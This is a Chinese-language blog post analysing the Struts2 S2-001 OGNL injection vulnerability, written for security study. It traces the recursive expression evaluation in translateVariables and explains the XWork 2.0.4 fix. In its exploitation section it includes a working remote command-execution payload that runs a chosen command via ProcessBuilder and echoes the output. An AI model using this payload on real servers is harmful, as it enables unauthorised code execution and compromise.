Chybeta

【struts2 命令/代码执行漏洞分析系列】S2-001

首发于:阿里先知安全社区:【struts2 命令/代码执行漏洞分析系列】S2-001

前言

最近学习java安全,在分析s2-001的时候发现了一些问题和心得。一方面网上关于s2-001的漏洞分析很少,基本上都是poc+利用而已,另一方面在调试过程中感觉apache官方通告有不准确的地方,这点见后面的一点说明部分,有不准确的地方望各位师傅指出,谢谢。

漏洞信息

漏洞信息页面: https://cwiki.apache.org/confluence/display/WW/S2-001

漏洞成因官方概述:Remote code exploit on form validation error

漏洞影响:

WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 - WebWork 2.2.5, Struts 2.0.0 - Struts 2.0.8

环境搭建

源码结构:

几个主要文件(待会用到):
index.jsp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<html>
<head>
<title>用户登录</title>
</head>
<body>
<h1>用户登录</h1>
<s:form action="login">
<s:textfield name="username" label="username" />
<s:textfield name="password" label="password" />
<s:submit></s:submit>
</s:form>
</body>
</html>

struts.xml:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE struts PUBLIC
"-//Apache Software Foundation//DTD Struts Configuration 2.0//EN"
"http://struts.apache.org/dtds/struts-2.0.dtd">
<struts>
<package name="s2-001" extends="struts-default">
<action name="login" class="com.test.LoginAction">
<result name="success">/success.jsp</result>
<result name="error">/index.jsp</result>
</action>
</package>
</struts>

web.xml:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://xmlns.jcp.org/xml/ns/javaee" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd" id="WebApp_ID" version="3.1">
<filter>
<filter-name>struts2</filter-name>
<filter-class>org.apache.struts2.dispatcher.FilterDispatcher</filter-class>
</filter>
<filter-mapping>
<filter-name>struts2</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<welcome-file-list>
<welcome-file>index.jsp</welcome-file>
</welcome-file-list>
</web-app>

完整源码见附件。

漏洞利用

最简单poc:

1
%{1+1}

任意命令执行:

1
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

new java.lang.String[]{"pwd"})中的pwd替换为对应的命令,即可执行。

漏洞分析

在经过tomcat容器的处理后,http请求会到达struts2,从这里开始调试吧。

在 /com/opensymphony/xwork2/interceptor/ParametersInterceptor.java:158 接受我们输入的参数值,之后会调用对应的set方法(这个省略):

1
2
3
4
ValueStack stack = ac.getValueStack();
setParameters(action, stack, parameters);
} finally {

继续执行,执行完interceptor部分,也即对return invocation.invoke();进行step over,到达/com/opensymphony/xwork2/DefaultActionInvocation.java:252

跟进executeResult(),到达 /com/opensymphony/xwork2/DefaultActionInvocation.java:343

跟进result.execute(this),到达 /org/apache/struts2/dispatcher/StrutsResultSupport.java:175:

此后在dispatcher.forward(request, response);跟进,此处省略一些过程,相关调用栈如下:

进入 /org/apache/struts2/views/jsp/ComponentTagSupport.java:47,

这里会对jsp标签进行解析,但这时的标签并不包含我们的payload,我们可以在这里step over,直到解析到对应的标签:

如上图,我们提交的password值为%{1+1},因此着重关注对<s:textfield name="password" label="password" />解析。回到doStartTag,执行完后会再次回到index.jsp,此时遇到了相应的闭合标签/>,会跳转到doEndTag:

1
2
3
4
5
public int doEndTag() throws JspException {
component.end(pageContext.getOut(), getBody());
component = null;
return EVAL_PAGE;
}

跟进component.end(),到达 /org/apache/struts2/components/UIBean.java:486:

跟入evaluateParams后一直执行到如下图

由于开启了altSyntax,expr变为为%{password}

跟入addParameter("nameValue", findValue(expr, valueClazz));中的findValue,来到 /org/apache/struts2/components/Component.java:318

1
2
3
4
protected Object findValue(String expr, Class toType) {
if (altSyntax() && toType == String.class) {
return TextParseUtil.translateVariables('%', expr, stack);
}

开启了altSyntaxtoTypeclass.java.lang.string,跟入TextParseUtil.translateVariables,在/com/opensymphony/xwork2/util/TextParseUtil.java:

1
2
3
public static String translateVariables(char open, String expression, ValueStack stack) {
return translateVariables(open, expression, stack, String.class, null).toString();
}

继续跟入translateVariables,源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator) {
// deal with the "pure" expressions first!
//expression = expression.trim();
Object result = expression;
while (true) {
int start = expression.indexOf(open + "{");
int length = expression.length();
int x = start + 2;
int end;
char c;
int count = 1;
while (start != -1 && x < length && count != 0) {
c = expression.charAt(x++);
if (c == '{') {
count++;
} else if (c == '}') {
count--;
}
}
end = x - 1;
if ((start != -1) && (end != -1) && (count == 0)) {
String var = expression.substring(start + 2, end);
Object o = stack.findValue(var, asType);
if (evaluator != null) {
o = evaluator.evaluate(o);
}
String left = expression.substring(0, start);
String right = expression.substring(end + 1);
if (o != null) {
if (TextUtils.stringSet(left)) {
result = left + o;
} else {
result = o;
}
if (TextUtils.stringSet(right)) {
result = result + right;
}
expression = left + o + right;
} else {
// the variable doesn't exist, so don't display anything
result = left + right;
expression = left + right;
}
} else {
break;
}
}
return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
}

此时expression%{password}

经过while循环,确定start和end定位后,此时varpassword,到达:

stack.findValue(var, asType);会返回password的值%{1+1},这个就是我们传入的payload:

此后o%{1+1},再对o进行了一番处理后,payload经过result变量,最终成为expression的值:

在完成后,进入下一个循环:

并且在Object o = stack.findValue(var, asType);中完成了对payload的执行

因此究其原因,在于在translateVariables中,递归解析了表达式,在处理完%{password}后将password的值直接取出并继续在while循环中解析,若用户输入的password是恶意的ognl表达式,比如%{1+1},则得以解析执行。

漏洞修复

XWork 2.0.4中,改变了ognl表达式的解析方法从而不会产生递归解析,用户的输入也不会再解析执行。

对应源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator, int maxLoopCount) {
// deal with the "pure" expressions first!
//expression = expression.trim();
Object result = expression;
int loopCount = 1;
int pos = 0;
while (true) {
int start = expression.indexOf(open + "{", pos);
if (start == -1) {
pos = 0;
loopCount++;
start = expression.indexOf(open + "{");
}
if (loopCount > maxLoopCount) {
// translateVariables prevent infinite loop / expression recursive evaluation
break;
}
int length = expression.length();
int x = start + 2;
int end;
char c;
int count = 1;
while (start != -1 && x < length && count != 0) {
c = expression.charAt(x++);
if (c == '{') {
count++;
} else if (c == '}') {
count--;
}
}
end = x - 1;
if ((start != -1) && (end != -1) && (count == 0)) {
String var = expression.substring(start + 2, end);
Object o = stack.findValue(var, asType);
if (evaluator != null) {
o = evaluator.evaluate(o);
}
String left = expression.substring(0, start);
String right = expression.substring(end + 1);
String middle = null;
if (o != null) {
middle = o.toString();
if (!TextUtils.stringSet(left)) {
result = o;
} else {
result = left + middle;
}
if (TextUtils.stringSet(right)) {
result = result + right;
}
expression = left + middle + right;
} else {
// the variable doesn't exist, so don't display anything
result = left + right;
expression = left + right;
}
pos = (left != null && left.length() > 0 ? left.length() - 1: 0) +
(middle != null && middle.length() > 0 ? middle.length() - 1: 0) +
1;
pos = Math.max(pos, 1);
} else {
break;
}
}
return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
}

当解析完一层表达式后,如图,此时loopCount > maxLoopCount,从而执行break,不再继续解析%{1+1}:

diff的结果如下:

一个说明

回到漏洞信息和开头环境搭建部分,漏洞信息中的图有画上了几个红圈。基于此问一个问题:表单验证错误是在哪里触发的?

查阅apache2官方文档(https://struts.apache.org/core-developers/validation.html)提到

就本次测试源码而言,并没有相应的validation.xml或其他validation方法。为更直观起见,我们修改LoginAction.java源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
public void setPassword(String password) {
this.password = "%{1+1}";
}
public void setUsername(String username) {
this.username = "chybeta";
}
@Override
public String execute() throws Exception {
if (username.equals("chybeta") ) {
return "error";
} else {
return "success";
}
}

当submit时,会执行相应的set方法,直接设置username和password分别为chybeta%{1+1}。修改后的源码中的execute方法中若usernamechybeta则返回error,根据struts.xml配置文件,当返回error时,会返回index.jsp,即这里不算存在逻辑上的验证错误,因为username被硬编码为chybeta了,username.equals("chybeta")恒成立。

所以这里没有涉及到我们传入的参数,不存在表单验证失败,也不存在逻辑上的验证失败。执行poc如下:

所以可以说表单验证错误并不是该漏洞的产生的原因,但表单验证错误是这个漏洞出现的场景之一。在struts2框架中,配置了Validation,倘若验证出错会往往会原样返回用户输入的值而且不会跳转到新的页面,而在最后解析页面时区解析了用户输入的值,从而执行payload。在实际场景中,比如登陆等处,往往会配置了Validation,比如限制用户名长度,数字的范围等等,从而成为了该漏洞的高发区。

以struts2的showcase为例:

在本测试环境的源码中,没有表单验证,但同样把用户的输入留在了页面里,从而在解析的时候执行了。

Refference

微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】

本文标题:【struts2 命令/代码执行漏洞分析系列】S2-001

文章作者:chybeta

发布时间:2018年02月06日 - 11:02

最后更新:2018年02月10日 - 08:02

原始链接:http://chybeta.github.io/2018/02/06/【struts2-命令-代码执行漏洞分析系列】S2-001/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。